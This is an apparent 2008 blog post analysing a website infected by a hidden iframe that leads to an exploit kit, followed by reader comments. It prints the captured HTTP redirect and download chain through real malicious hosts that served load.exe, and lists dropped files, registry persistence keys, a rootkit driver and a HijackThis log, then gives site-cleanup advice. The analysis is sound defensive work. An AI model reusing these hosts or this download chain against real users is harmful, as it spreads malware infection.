Website with hidden iframe and Malware Analysis
All began this morning (16/10/2008) at 13:00am, I checked the HTML code of index.php and I saw something suspicious inside. Our index.php and 4 other .php pages were infected with an iframe from 11:00am to 13:00am, and fortunately we analyze the code of our site every 2/3 hours, and immediatly removed the infected code.
I decided to analyze the iframe code and used an old version of Internet Explorer 6.0, unpatched to make sure I got infected. I visited that iframe and after a few seconds a massive malware infection started, and my computer started connecting to a lot of different IPs.
Here is result of the network traffic sniffed:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 | GET /in.cgi?id111 HTTP/1.1 Host: fstat.cn Connection: Keep-Alive HTTP/1.1 302 Found Location: hxxp://mmcounter.com/tds/in.cgi?default GET /tds/in.cgi?default HTTP/1.1 Accept-Language: en-us Host: mmcounter.com Connection: Keep-Alive HTTP/1.1 302 Found Location: hxxp://lite.ff-freehosting.com/all/index.php GET /all/index.php HTTP/1.1 Host: lite.ff-freehosting.com HTTP/1.1 200 OK Content-Length: 7880 GET /all/controller.php?action=bot&entity_list=0 HTTP/1.1 Host: 66.232.116.2 HTTP/1.1 200 OK Content-Length: 397312 Entity-Info: 6:71168:2;10:41984:1;38:42496:2;44:57344:2;46:184320:2; Rnd: 983332 Magic-Number: 32|0|85:214:242:0:116:131:195:213:214:77:222:73 GET /all/load.php?id=45751&spl=5 HTTP/1.1 Host: lite.ff-freehosting.com Connection: Keep-Alive HTTP/1.1 200 OK Content-Disposition: inline; filename=load.exe Content-Length: 17475 GET /all/controller.php?action=bot&entity_list=&uid=2&first=1&guid=0&rnd=982735 HTTP/1.1 Host: 66.232.116.2 HTTP/1.1 200 OK Content-Length: 397312 Entity-Info: 6:71168:2;10:41984:1;38:42496:2;44:57344:2;46:184320:2; Rnd: 983188 Magic-Number: 32|0|185:234:45:115:54:0:22:233:187:219:150 Connection: close |
While internet traffic sniffer was active, the computer was infected with malware that was downloaded in Temp folder with the name winMN448Eewaoz.exe and after this file was executed, it dropped a file in C:\WINDOWS\system32\ with the name ~.exe, that was downloaded via this GET query:
1 | GET /all/load.php?id=45751&spl=5 HTTP/1.1 |
We can see the file load.php has a variable named spl with assigned the number 5 and we can assume it has loaded the payload for the exploit (aka sploit) number 5. Again we can assume this is an exploit kit that is serving more than 5 different exploits to infect an user.
Here is a small analysis of that malware activity:
- Downloaded in Temp Folder as winMN448Eewaoz.exe
- Copyed in C:\WINDOWS\system32\~.exe
- Injected code into svchost.exe
- Opened remote connections with IP 66.232.116.2 on port 80
After some time others files were downloaded in my system. I started Rootkit Unhooker and I noticed some suspicious drivers in the Driver List that made me think of a possible stealth malware or rootkit activity.
If you click properties on driver column of rnvrnrrv.sys you get the file is of 0 bytes… Why 0 bytes and no info on creation/modification etc. ?
The kernel driver rnvrnrrv.sys is loaded and hidden from explorer search (seems that the driver hides every file with name *rnvrnrrv*).
Below there are PE Import Table of rnvrnrrv.sys:
+NTOSKRNL.EXE
ExAllocatePoolWithTag
ExFreePoolWithTag
ZwQuerySystemInformation
RtlImageDirectoryEntryToData
memcpy
memset
_except_handler3
Here is a list of all created files by the malware (there is no order):
1 2 3 4 5 6 7 8 9 10 11 12 13 | C:\WINDOWS\msauc.exe C:\WINDOWS\system32\*randomnumber*.cpx C:\WINDOWS\system32\*randomnumber*.dat C:\WINDOWS\system32\wpv*randomnumber*.cpx C:\WINDOWS\system32\msansspc.dll %TempFolder%\winMN448Eewaoz.exe %ProgramFiles%\xeifh\SetActAdm.dll %ProgramFiles%\Internet Explorer\msansspc.dll C:\WINDOWS\system32\drivers\rnvrnrrv.sys C:\WINDOWS\system32\shell31.dll C:\WINDOWS\system32\fqqtiaag.tmp C:\WINDOWS\TDEZAALK.exe %AllUsers%\Application Data\almrahwt\mbqlmfin.exe |
The malware created following registry keys:
1 2 3 | HKLM\Software\Microsoft\Windows\CurrentVersion\Run\lsass driver HKLM\Software\Microsoft\Windows\CurrentVersion\Run\TDEZAALK HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\[51m3u05p5i] |
This is a log file of HijackThis with the malware traces:
1 2 3 4 5 6 7 8 9 10 | Running processes:
C:\WINDOWS\system32\wpv286.cpx
%AllUsers%\Application Data\almrahwt\mbqlmfin.exe
O4 - HKLM\..\Run: [lsass driver] C:\WINDOWS\msauc.exe
O4 - HKLM\..\Run: [TDEZAALK] %systemroot%\TDEZAALK.exe
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKLM\..\Policies\Explorer\Run: [51m3u05p5i] %AllUsers%\Application Data\almrahwt\mbqlmfin.exe
O21 - SSODL: SetActAdm - {002069A6-342F-036E-4AAB-03598A9EEFCE} - C:\Programmi\xeifh\SetActAdm.dll (file missing)
(SwPrvSchedule) - Unknown owner - C:\WINDOWS\system32\wpv5338.cpx.exe (file missing) |
What can we do if our website is infected ?
- Clean the infected HTML/PHP pages
- Change username and password to the FTP Account
- Change username and password to the Email Account
- Change username and password to the SSH
- Contact the server admin and explain your situation
- Check your PHP files for possible vulnerabilities
- Update all the installed software (blog, forum, etc)
- Remember to never make backups from the website to your PC
- Use always local backups for the website files
October 19th, 2008 at 11:36 pm
Great work man!
Which version of rku you used to detect the rootkit ?
LaiD
October 21st, 2008 at 8:35 pm
hey LaiD,
I used version:
Rootkit Unhooker LE v3.8.340.550
December 13th, 2008 at 5:19 pm
Hi,
Impressed with the research done.
It is a very useful information. Would appeciate if somebody can give more info on how to remove the virus from the web server as google is reporting the site as melware spreading file and blocking it.
Looking for some simple solution to get rid off the problem.
Thanks,
December 17th, 2008 at 8:01 pm
Hi Hitesh,
you can send to my email(robert@novirusthans.org) the HiJackThis Logs (http://download.hijackthis.eu/HJTInstall.exe) so I can analyze it in a deeper way and I can suggest you how to remove the malware easily : )
-Robert
March 27th, 2009 at 5:24 am
Hi Robert,
This is the second time this site has been infected. For the first time, we removed the site from service and uploaded it again. After 2 weeks it was reinfected through an iframe code on the webpages.
How is the code inserted? What can be done to clean the website? Also how can we prevent future infections
Regards
Anand
March 28th, 2009 at 12:40 am
Hi Anand, I removed your link because your site is still infected with the hidden iframe, here is the captured malicious code:
You need to remove this malicious code from your homepage, you should also look at all your website files for other possible hidden iframe codes, and I suggest you to restore your website files with your old (clean) backup. Is possible that the hacker gained access to your server because there is a vulnerability in your website, be sure to check that you have latest version of all applications/web apps/cms installed in your website and that your website does not contains SQL/RFI/LFI bugs.
If you use a shared server, an hacker need only to own one of the shared websites to gain access to all other websites, my other suggestion is, if you have a shared server, to use a dedicated server.
Let me know if you have other problems or you need deeper help.
//Edit:
You can find the analysis by following this link:
Analysis of a website infected with a hidden iframe